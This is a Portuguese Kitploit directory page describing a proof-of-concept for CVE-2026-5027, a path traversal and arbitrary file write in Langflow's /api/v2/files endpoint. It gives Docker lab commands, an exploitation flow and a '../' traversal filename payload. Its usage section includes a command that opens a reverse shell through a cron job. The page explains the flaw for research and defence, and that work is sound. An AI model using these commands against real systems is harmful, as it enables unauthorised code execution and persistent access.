Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5027 — Proof-of-concept de exploit para CVE-2026-5027, uma path traversal e gravação arbitrária de arquivos no endpoint /api/v2/files do Langflow, com laboratório Docker e opção de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/yym8538/cve-2026-5027
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubyym8538/cve-2026-5027

CVE-2026-5027

Proof-of-concept de exploit para CVE-2026-5027, uma path traversal e gravação arbitrária de arquivos no endpoint /api/v2/files do Langflow, com laboratório Docker e opção de reverse shell.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este post é um artigo de pesquisa publicado pela EQSTLab.

Agradecimentos a Yahia Hamza, que reportou e analisou esta vulnerabilidade.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


Descrição

CVE-2026-5027 : Vulnerabilidade de Escrita Arbitrária de Arquivos no Langflow

descrição: Uma vulnerabilidade de path traversal no Langflow <= 1.8.4 permite que atacantes escrevam arquivos arbitrários fora do diretório de upload pretendido por meio de um filename multipart manipulado fornecido ao endpoint /api/v2/files. Em implantações onde o auto-login está habilitado ou a autenticação é de outra forma fracamente aplicada, este problema pode ser explorado para alcançar execução remota de código ao escrever conteúdo controlado pelo atacante em locais sensíveis do sistema de arquivos.


Configuração do Laboratório

Construa e execute o ambiente vulnerável usando Docker:

Construir Imagem

root@kitploit:~
docker build -t cve-2026-5027 .

Executar Contêiner

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Como usar

Executar

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Análise

Endpoint Vulnerável

root@kitploit:~
POST /api/v2/files

O problema existe porque a funcionalidade de upload confia no valor filename multipart fornecido pelo cliente. Em vez de gerar um nome de armazenamento seguro no lado do servidor ou restringir o caminho resolvido a um diretório de upload dedicado, o caminho de código vulnerável permite que sequências de travessia como ../ influenciem o caminho de destino final.

Como resultado, um atacante pode escapar da raiz de armazenamento pretendida e forçar a aplicação a escrever arquivos em locais arbitrários no sistema de arquivos do servidor.

Um fluxo de exploração representativo é o seguinte:

  1. Obter um token de acesso por meio de login normal ou de uma implantação com auto-login habilitado.
  2. Enviar uma requisição de upload multipart para /api/v2/files.
  3. Fornecer um filename manipulado contendo sequências de path traversal.
  4. Fazer com que o Langflow escreva conteúdo controlado pelo atacante fora do diretório de armazenamento esperado.

Este é fundamentalmente um problema CWE-22: Improper Limitation of a Pathname to a Restricted Directory.

Causa Raiz Técnica

A falha de segurança é causada por sanitização e validação insuficientes de caminhos de arquivo controlados pelo usuário durante o tratamento de upload. A aplicação aceita o nome de arquivo original do cliente e o passa para o fluxo de armazenamento sem aplicar adequadamente normalização e contenção de caminho.

Do ponto de vista defensivo, o padrão perigoso é conceitualmente semelhante ao seguinte:

root@kitploit:~
save_path = base_dir / file.filename

Se file.filename contiver componentes de path traversal como:

root@kitploit:~
../../../../tmp/poc.txt

o caminho resolvido final pode apontar para fora de base_dir, possibilitando escrita arbitrária de arquivos.

Por Que Isso Importa

Vulnerabilidades de escrita arbitrária de arquivos são frequentemente mais graves do que problemas padrão de upload irrestrito porque o atacante controla não apenas o conteúdo do arquivo, mas também o caminho de destino. Dependendo dos privilégios de execução do processo do Langflow, isso pode possibilitar:

  • sobrescrita de arquivos da aplicação
  • modificação de arquivos de inicialização ou de tarefas agendadas
  • persistência por meio de inicialização de shell ou arquivos de chave
  • escalação de escrita arbitrária de arquivos para execução remota de código

Cenário

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Aviso Legal

Este repositório não tem a intenção de facilitar a exploração não autorizada de instâncias do Langflow. O objetivo deste projeto é ajudar pesquisadores de segurança, defensores e desenvolvedores a entender a vulnerabilidade, validar a exposição em ambientes controlados e aplicar mitigações eficazes.


Referências

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Baixar ferramenta